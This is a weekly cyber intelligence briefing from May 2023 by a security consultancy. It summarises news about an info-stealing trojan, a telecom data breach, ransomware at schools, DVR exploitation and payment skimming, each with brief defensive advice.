5 May 2023

6 min read

New covert info stealing trojan detected in the wild | Cyber Intelligence Briefing: 5 May

May 2023
New covert info stealing trojan detected in the wild | Cyber Intelligence Briefing: 5 May placeholder thumbnail


Top news stories this week

  1. LOBSHOT. Novel covert info stealing trojan detected in the wild.
  2. Call it off. T-Mobile suffers second data breach this year.
  3. ‘The new crypto’. Security concerns over generative AI chatbots continue.
  4. Class dismissed. Dozens of US and UK schools hit with ransomware.
  5. Watch out. Hackers exploit exposed digital video recorders to gain initial access.
  6. Game over. Law enforcement takes action against dark web markets and crypto exchanges.
  7. Stolen at checkout. Fake payment forms used to steal customers’ credit card details.


1. LOBSHOT: new covert info stealing trojan detected in the wild

Cyber criminals are using malicious adverts on search engines to distribute a new malware variant named LOBSHOT. Disguised as legitimate software, the malware can bypass defence measures and provide full remote control of the infected device without the victim knowing. The trojan has been connected to data theft and financial fraud.

So what?

Organisations should verify the source of any new software installations and prevent installations from unauthorised sources.



New call-to-action


2. T-Mobile experiences second data breach of 2023

T-Mobile has confirmed a recent data breach resulted in personal and account data of several hundred customers being exposed. This marks T-Mobile's second security incident of 2023 and has put its customers at a greater risk of identity theft and phishing scams.

So what?

Security managers often use cyber security incidents to justify increasing their budgets. Additional funding should be directed appropriately to avoid the reputational impact of multiple breaches.



3. Privacy and security concerns relating to ChatGPT continue

Samsung has joined the growing number of companies banning its employees from using generative AI, such as OpenAI’s ChatGPT, after employees revealed sensitive information to the chatbot in order to check for errors. This decision follows JPMorgan, Verizon, and Citigroup, who also banned the use of ChatGPT due to privacy concerns relating to sensitive information being stored on OpenAI’s servers.

Separately, Meta’s CISO Guy Rosen recently described ChatGPT as ‘the new crypto’ given the surge in scams referencing the tool. In a recent security report, Meta stated it has discovered new malware strains posing as ChatGPT browser extensions and tools.

So what?

Sharing personal or professional information with AI chatbots is a security risk. It is vital to be mindful of what information is disclosed with such platforms, and ensure such tools are only accessed through legitimate portals.



4. Ransomware gangs continue to target educational institutions

Ransomware attacks have recently forced dozens of schools and colleges across the US and UK to shut down their networks. Recent targets in the US included Bluefield University and Truman State University, while Hardenhuish School in Wiltshire was hit in the UK. These incidents continue a trend of ransomware groups targeting educational institutions, with at least 27 confirmed attacks on US colleges and universities in 2023 so far.

So what?

Schools with limited cyber security budgets can be prime targets for opportunistic cyber criminals. Cost effective solutions such as regular patching and multi-factor authentication can help reduce the likelihood of such incidents.



5. Hackers exploit exposed digital video recorders to gain initial access 

Hackers are currently taking advantage of an unpatched vulnerability in TBK DVR (Digital Video Recording) devices to gain initial access into corporate networks. The DVR servers, which are used to store sensitive security footage from CCTV cameras, are typically located on the internal networks and provide a back door for entry.

So what?

Organisations must ensure that their Internet of Things (IoT) devices are secure and isolated from the main corporate network and that their vulnerabilities are reviewed on a regular basis.



6. Law enforcement takes action against dark web markets and crypto exchanges

In a major operation coordinated by Europol and involving nine countries, 288 dark web vendors were arrested, and the illegal marketplace ‘Monopoly Market’ was seized. Law enforcement seized over EUR 50.8 million in cash and virtual currencies, 850kg of drugs, and 117 firearms.

Separately, the FBI and Ukrainian police have seized nine cryptocurrency exchange websites used to launder ransomware payments and assist cyber criminals in obscuring the trace of money. The seized infrastructure will be analysed to identify cyber criminals and may lead to future arrests.

So what?

These operations show the ongoing efforts of law enforcement agencies to combat cybercrime and the use of cryptocurrency in illicit activities.



7. Hackers display fake payment forms to obtain customers' credit card details  

Hackers are using advanced skimming attacks to steal customers’ credit card details through realistic looking fake checkout forms on legitimate online stores. To further divert suspicion, the customer is shown a fake error and is then redirected to the real payment URL.

So what?

As fake payment forms become more realistic, online customers should be wary of suspicious payment errors. Consider single-use virtual cards which hackers cannot re-use.



Cyber Intelligence Briefing

The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.

To discuss this briefing or other industry developments, please reach out to one of our experts.


Kyle Schwaeble
Kyle Schwaeble
Senior Associate, Cyber Security

Kyle Schwaeble is a senior associate on S-RM’s cyber security team, bringing expertise in incident response management and, particularly, the secure restoration and recovery from cyber incidents such as ransomware attacks and business email compromises. In addition to his incident response work, Kyle has also supported multinational clients with their security transformation programmes, advising on the development and implementation of new technological, procedural, and cultural security controls.  

Kyle joined S-RM in 2019, initially working as an analyst in the Corporate Intelligence team, where he supported various corporate and diligence investigations. He holds a BCom(LLB) from Stellenbosch University in South Africa and is GSEC certified. 

James Tytler
James Tytler
Associate, Cyber Security

James Tytler is a cyber security associate in S-RM’s incident response team. In addition to responding to a wide range of cyber security incidents, he also supports clients with cyber threat intelligence services.

Before joining S-RM’s cyber security team, James worked at a London-based corporate intelligence firm, where he specialised in Middle Eastern subjects.

James has a BA in Arabic and Persian from the University of Cambridge, and an MA in International Security from Sciences Po Paris. He speaks fluent French.

Kyle Schwaeble
Kyle Schwaeble

Senior Associate, Cyber Security

James Tytler
James Tytler

Associate, Cyber Security

Share this post

Subscribe to our insights

Get industry news and expert insights straight to your inbox.